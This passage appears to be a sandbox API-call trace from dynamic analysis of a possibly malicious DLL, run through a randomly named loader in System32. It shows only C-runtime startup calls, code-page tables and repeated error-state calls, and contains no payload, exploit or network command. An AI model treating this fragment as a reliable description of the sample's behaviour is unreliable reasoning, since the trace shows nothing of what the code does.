(lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.606] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.606] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.607] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.607] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.607] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.607] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.607] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.607] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.607] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.608] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.608] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.608] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.608] GetCurrentThreadId () returned 0xe84 [0036.608] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllCanUnloadNow /fn_args=\"%Temp%\\IXP000.TMP\\\"" [0036.608] GetEnvironmentStringsW () returned 0x3c7990* [0036.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0036.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x1609f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0036.608] FreeEnvironmentStringsW (penv=0x3c7990) returned 1 [0036.608] GetStartupInfoA (in: lpStartupInfo=0x26f54c | out: lpStartupInfo=0x26f54c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0036.609] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0036.609] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0036.609] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0036.609] SetHandleCount (uNumber=0x20) returned 0x20 [0036.609] GetLastError () returned 0x0 [0036.609] SetLastError (dwErrCode=0x0) [0036.609] GetLastError () returned 0x0 [0036.609] SetLastError (dwErrCode=0x0) [0036.609] GetLastError () returned 0x0 [0036.609] SetLastError (dwErrCode=0x0) [0036.609] GetACP () returned 0x4e4 [0036.609] GetLastError () returned 0x0 [0036.609] SetLastError (dwErrCode=0x0) [0036.609] IsValidCodePage (CodePage=0x4e4) returned 1 [0036.609] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x26f52c | out: lpCPInfo=0x26f52c) returned 1 [0036.609] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x26eff8 | out: lpCPInfo=0x26eff8) returned 1 [0036.609] GetLastError () returned 0x0 [0036.609] SetLastError (dwErrCode=0x0) [0036.609] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x26ef88 | out: lpCharType=0x26ef88) returned 1 [0036.609] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0036.609] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f40c, cbMultiByte=256, lpWideCharStr=0x26ed78, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā") returned 256 [0036.609] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā", cchSrc=256, lpCharType=0x26f00c | out: lpCharType=0x26f00c) returned 1 [0036.609] GetLastError () returned 0x0 [0036.609] SetLastError (dwErrCode=0x0) [0036.609] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0036.610] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0036.610] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f40c, cbMultiByte=256, lpWideCharStr=0x26ed48, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0036.610] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0036.610] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x26eb38, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0036.610] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x26f30c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ_\x06ïõDõ&", lpUsedDefaultChar=0x0) returned 256 [0036.610] GetLastError () returned 0x0 [0036.610] SetLastError (dwErrCode=0x0) [0036.610] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0036.610] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f40c, cbMultiByte=256, lpWideCharStr=0x26ed68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0036.610] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0036.610] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x26eb58, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0036.610] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x26f20c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ_\x06ïõDõ&", lpUsedDefaultChar=0x0) returned 256 [0036.610] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.610] GetLastError () returned 0x0 [0036.610] SetLastError (dwErrCode=0x0) [0036.610] GetLastError () returned 0x0 [0036.610] SetLastError (dwErrCode=0x0) [0036.610] GetLastError () returned 0x0 [0036.610] SetLastError (dwErrCode=0x0) [0036.610] GetLastError () returned 0x0 [0036.610] SetLastError (dwErrCode=0x0) [0036.610] GetLastError () returned 0x0 [0036.610] SetLastError (dwErrCode=0x0) [0036.611] GetLastError () returned 0x0 [0036.611] SetLastError (dwErrCode=0x0) [0036.611] GetLastError () returned 0x0 [0036.611] SetLastError (dwErrCode=0x0) [0036.611] GetLastError () returned 0x0 [0036.611] SetLastError (dwErrCode=0x0) [0036.611] GetLastError () returned 0x0 [0036.611] SetLastError (dwErrCode=0x0) [0036.611] GetLastError () returned 0x0 [0036.611] SetLastError (dwErrCode=0x0) [0036.611] GetLastError () returned 0x0 [0036.611] SetLastError (dwErrCode=0x0) [0036.611] GetLastError () returned 0x0 [0036.611] SetLastError (dwErrCode=0x0) [0036.611] GetLastError () returned 0x0 [0036.611] SetLastError (dwErrCode=0x0) [0036.611] GetLastError () returned 0x0 [0036.611] SetLastError (dwErrCode=0x0) [0036.611] GetLastError () returned 0x0 [0036.611] SetLastError (dwErrCode=0x0) [0036.611] GetLastError () returned 0x0 [0036.611] SetLastError (dwErrCode=0x0) [0036.611] GetLastError () returned 0x0 [0036.611] SetLastError (dwErrCode=0x0) [0036.611] GetLastError () returned 0x0 [0036.611] SetLastError (dwErrCode=0x0) [0036.612] GetLastError () returned 0x0 [0036.612] SetLastError (dwErrCode=0x0) [0036.612] GetLastError () returned 0x0 [0036.612] SetLastError (dwErrCode=0x0) [0036.612] GetLastError () returned 0x0 [0036.612] SetLastError (dwErrCode=0x0) [0036.612] GetLastError () returned 0x0 [0036.612] SetLastError (dwErrCode=0x0) [0036.612] GetLastError () returned 0x0 [0036.612] SetLastError (dwErrCode=0x0) [0036.612] GetLastError () returned 0x0 [0036.612] SetLastError (dwErrCode=0x0) [0036.612] GetLastError () returned 0x0 [0036.612] SetLastError (dwErrCode=0x0) [0036.618] GetLastError () returned 0x0 [0036.618] SetLastError (dwErrCode=0x0) [0036.618] GetLastError () returned 0x0 [0036.618] SetLastError (dwErrCode=0x0) [0036.618] GetLastError () returned 0x0 [0036.619] SetLastError (dwErrCode=0x0) [0036.619] GetLastError () returned 0x0 [0036.619] SetLastError (dwErrCode=0x0) [0036.619] GetLastError () returned 0x0 [0036.619] SetLastError (dwErrCode=0x0) [0036.619] GetLastError () returned 0x0 [0036.619] SetLastError (dwErrCode=0x0) [0036.619] GetLastError () returned 0x0 [0036.619] SetLastError (dwErrCode=0x0) [0036.619] GetLastError () returned 0x0 [0036.619] SetLastError (dwErrCode=0x0) [0036.619] GetLastError () returned 0x0 [0036.619] SetLastError (dwErrCode=0x0) [0036.619] GetLastError () returned 0x0 [0036.619] SetLastError (dwErrCode=0x0) [0036.619] GetLastError () returned 0x0 [0036.619] SetLastError (dwErrCode=0x0) [0036.619] GetLastError () returned 0x0 [0036.619] SetLastError (dwErrCode=0x0) [0036.619] GetLastError () returned 0x0 [0036.619] SetLastError (dwErrCode=0x0) [0036.619] GetLastError () returned 0x0 [0036.619] SetLastError (dwErrCode=0x0) [0036.619] GetLastError () returned 0x0 [0036.619] SetLastError (dwErrCode=0x0) [0036.619] GetLastError () returned 0x0 [0036.620] SetLastError (dwErrCode=0x0) [0036.620] GetLastError () returned 0x0 [0036.620] SetLastError (dwErrCode=0x0) [0036.620] GetLastError () returned 0x0 [0036.620] SetLastError (dwErrCode=0x0) [0036.620] GetLastError () returned 0x0 [0036.620] SetLastError (dwErrCode=0x0) [0036.620] GetLastError () returned 0x0 [0036.620] SetLastError (dwErrCode=0x0) [0036.620] GetLastError () returned 0x0 [0036.620] SetLastError (dwErrCode=0x0) [0036.620] GetLastError () returned 0x0 [0036.620] SetLastError (dwErrCode=0x0) [0036.620] GetLastError () returned 0x0 [0036.620] SetLastError (dwErrCode=0x0) [0036.620] GetLastError () returned 0x0 [0036.620] SetLastError (dwErrCode=0x0) [0036.620] GetLastError () returned 0x0 [0036.620] SetLastError (dwErrCode=0x0) [0036.620] GetLastError () returned 0x0 [0036.620] SetLastError (dwErrCode=0x0) [0036.620] GetLastError () returned 0x0 [0036.620] SetLastError (dwErrCode=0x0) [0036.620] GetLastError () returned 0x0 [0036.620] SetLastError (dwErrCode=0x0) [0036.620] GetLastError () returned 0x0 [0036.621] SetLastError (dwErrCode=0x0) [0036.621] GetLastError () returned 0x0 [0036.621] SetLastError (dwErrCode=0x0) [0036.621] GetLastError () returned 0x0 [0036.621] SetLastError (dwErrCode=0x0) [0036.621] GetLastError () returned 0x0 [0036.621] SetLastError (dwErrCode=0x0) [0036.621] GetLastError () returned 0x0 [0036.621] SetLastError (dwErrCode=0x0) [0036.621] GetLastError () returned 0x0 [0036.621] SetLastError (dwErrCode=0x0) [0036.621] GetLastError () returned 0x0 [0036.621] SetLastError (dwErrCode=0x0) [0036.621] GetLastError () returned 0x0 [0036.621] SetLastError (dwErrCode=0x0) [0036.621] GetLastError () returned 0x0 [0036.621] SetLastError (dwErrCode=0x0) [0036.621] GetLastError () returned 0x0 [0036.621] SetLastError (dwErrCode=0x0) [0036.621] GetLastError () returned 0x0 [0036.621] SetLastError (dwErrCode=0x0) [0036.621] GetLastError () returned 0x0 [0036.621] SetLastError (dwErrCode=0x0) [0036.621] GetLastError () returned 0x0 [0036.621] SetLastError (dwErrCode=0x0) [0036.621] GetLastError () returned 0x0 [0036.622] SetLastError (dwErrCode=0x0) [0036.622] GetLastError () returned 0x0 [0036.622] SetLastError (dwErrCode=0x0) [0036.622] GetLastError () returned 0x0 [0036.622] SetLastError (dwErrCode=0x0) [0036.622] GetLastError () returned 0x0 [0036.622] SetLastError (dwErrCode=0x0) [0036.622] GetLastError () returned 0x0 [0036.622] SetLastError (dwErrCode=0x0) [0036.622] GetLastError () returned 0x0 [0036.622] SetLastError (dwErrCode=0x0) [0036.622] GetLastError () returned 0x0 [0036.622] SetLastError (dwErrCode=0x0) [0036.622] GetLastError () returned 0x0 [0036.622] SetLastError (dwErrCode=0x0) [0036.622] GetLastError () returned 0x0 [0036.622] SetLastError (dwErrCode=0x0) [0036.622] GetLastError () returned 0x0 [0036.622] SetLastError (dwErrCode=0x0) [0036.622] GetLastError () returned 0x0 [0036.622] SetLastError (dwErrCode=0x0) [0036.622] GetLastError () returned 0x0 [0036.622] SetLastError (dwErrCode=0x0) [0036.622] GetLastError () returned 0x0 [0036.622] SetLastError (dwErrCode=0x0) [0036.622] GetLastError () returned 0x0 [0036.623] SetLastError (dwErrCode=0x0) [0036.623] GetLastError () returned 0x0 [0036.623] SetLastError (dwErrCode=0x0) [0036.623] GetLastError () returned 0x0 [0036.623] SetLastError (dwErrCode=0x0) [0036.623] GetLastError () returned 0x0 [0036.623] SetLastError (dwErrCode=0x0) [0036.623] GetLastError () returned 0x0 [0036.623] SetLastError (dwErrCode=0x0) [0036.623] GetLastError () returned 0x0 [0036.623] SetLastError (dwErrCode=0x0) [0036.623] GetLastError () returned 0x0 [0036.623] SetLastError (dwErrCode=0x0) [0036.623] GetLastError () returned 0x0 [0036.623] SetLastError (dwErrCode=0x0) [0036.623] GetLastError () returned 0x0 [0036.623] SetLastError (dwErrCode=0x0) [0036.623] GetLastError () returned 0x0 [0036.623] SetLastError (dwErrCode=0x0) [0036.623] GetLastError () returned 0x0 [0036.623] SetLastError (dwErrCode=0x0) [0036.623] GetLastError () returned 0x0 [0036.623] SetLastError (dwErrCode=0x0) [0036.623] GetLastError () returned 0x0 [0036.623] SetLastError (dwErrCode=0x0) [0036.623] GetLastError () returned 0x0 [0036.624] SetLastError (dwErrCode=0x0) [0036.624] GetLastError () returned 0x0 [0036.624] SetLastError (dwErrCode=0x0) [0036.624] GetLastError () returned 0x0 [0036.624] SetLastError (dwErrCode=0x0) [0036.624] GetLastError () returned 0x0 [0036.624] SetLastError (dwErrCode=0x0) [0036.624] GetLastError () returned 0x0 [0036.624] SetLastError (dwErrCode=0x0) [0036.624] GetLastError () returned 0x0 [0036.624] SetLastError (dwErrCode=0x0) [0036.624] GetLastError () returned 0x0 [0036.624] SetLastError (dwErrCode=0x0) [0036.624] GetLastError () returned 0x0 [0036.624] SetLastError (dwErrCode=0x0) [0036.624] GetLastError () returned 0x0 [0036.624] SetLastError (dwErrCode=0x0) [0036.624] GetLastError () returned 0x0 